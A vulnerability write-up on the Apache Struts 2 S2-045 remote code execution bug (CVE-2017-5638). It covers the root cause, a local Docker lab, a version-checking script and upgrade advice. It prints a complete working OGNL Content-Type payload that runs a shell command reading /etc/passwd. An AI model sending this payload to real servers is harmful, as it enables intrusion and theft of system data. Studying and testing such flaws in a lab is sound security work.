# CVE-2017-5638

## Root cause

Update 18 Mar 2017:
Will it Pwn CVE-2017-5638: Remote Code Execution in Apache Struts 2? - this post gives a more detailed analysis.


The TrendLabs Security Intelligence Blog explains the root cause of the RCE by analysing the Struts source code.

As per documentation, struts.multipart.parser used by the fileUpload interceptor to handle HTTP POST requests, encoded using the MIME-type multipart/form-data, can be changed out. Currently there are two choices, jakarta and pell. The jakarta parser is a standard part of the Struts 2 framework needing only its required libraries added to a project. As from Struts version 2.3.18 a new implementation of MultiPartRequest was added – JakartaStreamMultiPartRequest. It can be used to handle large files.

## Demo

### Setup

Using docker, we can quickly set up a demo.

```
$ wget https://dist.apache.org/repos/dist/release/struts/2.3.31/struts-2.3.31-apps.zip
$ unzip struts*.zip
```

Dockerfile:

```
FROM tomcat:7-jre8
ADD struts-2.3.31/apps/struts2-blank.war /usr/local/tomcat/webapps/
CMD ["catalina.sh", "run"]
```

```
$ docker build -t struts/s2_045 .
$ docker run -it --rm -p 8080:8080 struts/s2_045
```

Visit http://localhost:8080/struts2-blank

### Payload

```
Content-Type:%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
```

![](/content/images/2017/03/struts2_rce.png)

### Source Code Review

Self-check: look in the web application's /WEB-INF/lib/ directory for the struts-core.x.x.jar file; if its version is between Struts 2.3.5 and Struts 2.3.31, or between Struts 2.5 and Struts 2.5.10, the application is vulnerable.
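
The self-check above as a script, added here as an example (not code from the original post or from the Struts project). It assumes the core jar in WEB-INF/lib carries the real Maven artifact name `struts2-core-<version>.jar`, and the file names in the `__main__` block are constructed samples.

```python
import re
import sys
from pathlib import Path
from typing import Dict, Iterable, Tuple

# Affected versions from the S2-045 advisory, both ends inclusive:
# Struts 2.3.5 - 2.3.31 and Struts 2.5 - 2.5.10.
VULNERABLE_RANGES = [
    ((2, 3, 5), (2, 3, 31)),
    ((2, 5), (2, 5, 10)),
]

# Assumption: the core jar under WEB-INF/lib is named struts2-core-<version>.jar
JAR_RE = re.compile(r"^struts2-core-(\d+(?:\.\d+)*)\.jar$", re.IGNORECASE)

def parse_version(text: str) -> Tuple[int, ...]:
    """'2.5.10.1' -> (2, 5, 10, 1); only numeric dotted versions are handled."""
    return tuple(int(part) for part in text.split("."))

def is_vulnerable(version: str) -> bool:
    """True if the version lies inside one of the affected ranges (inclusive)."""
    v = parse_version(version)
    for low, high in VULNERABLE_RANGES:
        # Right-pad with zeros so 2.5 compares as 2.5.0.0 against 2.5.10.1.
        n = max(len(v), len(low), len(high))
        pad = lambda t: t + (0,) * (n - len(t))
        if pad(low) <= pad(v) <= pad(high):
            return True
    return False

def check_jar_names(names: Iterable[str]) -> Dict[str, bool]:
    """Map every struts2-core jar name found to whether its version is affected."""
    result = {}
    for name in names:
        m = JAR_RE.match(name)
        if m:
            result[name] = is_vulnerable(m.group(1))
    return result

def check_lib_dir(lib_dir: str) -> Dict[str, bool]:
    """Scan a deployed application's WEB-INF/lib directory."""
    return check_jar_names(p.name for p in Path(lib_dir).iterdir() if p.is_file())

if __name__ == "__main__":
    # Constructed sample names; pass a real WEB-INF/lib path as argv[1] instead.
    sample = ["struts2-core-2.3.31.jar", "struts2-core-2.5.10.1.jar", "ognl-3.0.19.jar"]
    found = check_lib_dir(sys.argv[1]) if len(sys.argv) > 1 else check_jar_names(sample)
    for jar, vuln in found.items():
        print(f"{jar}: {'VULNERABLE, upgrade' if vuln else 'not affected'}")
```

Note that the padding step matters at the upper edge: 2.5.10 is affected while the fixed 2.5.10.1 is not.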


### Mitigation

Upgrade to Struts 2.3.32 or Struts 2.5.10.1

## Bonus

When you need to intercept traffic to localhost, append a <span style="background:yellow">.</span> to the host in the URL, i.e. <span style="background:yellow">localhost.</span>
![](/content/images/2017/03/Screen-Shot-2017-03-21-at-10.38.07-AM.png)


## Ref

- [S2-045 - Apache Struts 2 Documentation - Apache Software Foundation](https://cwiki.apache.org/confluence/display/WW/S2-045?from=groupmessage%22)
- [Apache Struts2の脆弱性(CVE-2017-5638)を検証してみた - とある診断員の備忘録](http://tigerszk.hatenablog.com/entry/2017/03/08/063334)
- [Exploit RCE para Apache Struts (CVE-2017-5638) o cómo miles de servidores en Internet están en peligro : hackplayers](http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html)
- [新闻中心-杭州安恒信息技术有限公司-应用安全和数据库安全的领航者](http://www.dbappsecurity.com.cn/news/n2017/201703_09_01.html)

POC:

- [tengzhangchao/Struts2_045-Poc: Struts2-045 POC](https://github.com/tengzhangchao/Struts2_045-Poc)
- [Qualys ThreatPROTECT](https://threatprotect.qualys.com/2017/03/08/apache-struts-jakarta-multipart-parser-remote-code-execution-vulnerability/)
- [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/issues/8064)
- [pwntester/S2-046-PoC: S2-046-PoC](https://github.com/pwntester/S2-046-PoC)